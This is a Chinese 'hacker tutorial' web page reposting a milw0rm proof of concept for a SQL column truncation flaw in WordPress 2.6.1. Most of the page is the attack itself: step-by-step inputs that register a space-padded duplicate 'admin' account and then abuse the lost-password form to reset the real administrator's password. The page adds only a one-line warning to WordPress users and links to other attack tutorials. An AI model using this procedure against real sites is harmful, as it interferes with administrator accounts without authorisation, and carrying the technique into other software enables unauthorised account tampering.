手机
当前位置:查字典教程网 >网络安全 >黑客教程 >WordPress 2.6.1 SQL Column Truncation Vulnerability
WordPress 2.6.1 SQL Column Truncation Vulnerability
摘要:用wordpress的要注意了#WordPress2.6.1SQLColumnTruncationVulnerability(PoC)##f...

用wordpress的要注意了 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

#

# found by irk4z[at]yahoo.pl

# homepage: http://irk4z.wordpress.com/

#

# this is not critical vuln [;

#

# first, read this discovery:

# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/

#

# in this hack we can remote change admin password, if registration enabled

#

# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x

email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com

【WordPress 2.6.1 SQL Column Truncation Vulnerability】相关文章:

防止CSRF攻击ASP.NET应用

详解嗅探(被动嗅探)与ARP欺骗(主动嗅探)

XSS攻击防御技术

Tomcat后台拿shell

黑客对社交网站攻击的常见五大手法(图文)

必须了解的黑客入侵网站的十条原因及相应抵御方法

webshell 提权方法 服务器提权教程

SQL脚本注入的不常见方法总结

看黑客是如何黑了落伍者的(图)

mssql SA权限最新利用方法

精品推荐
分类导航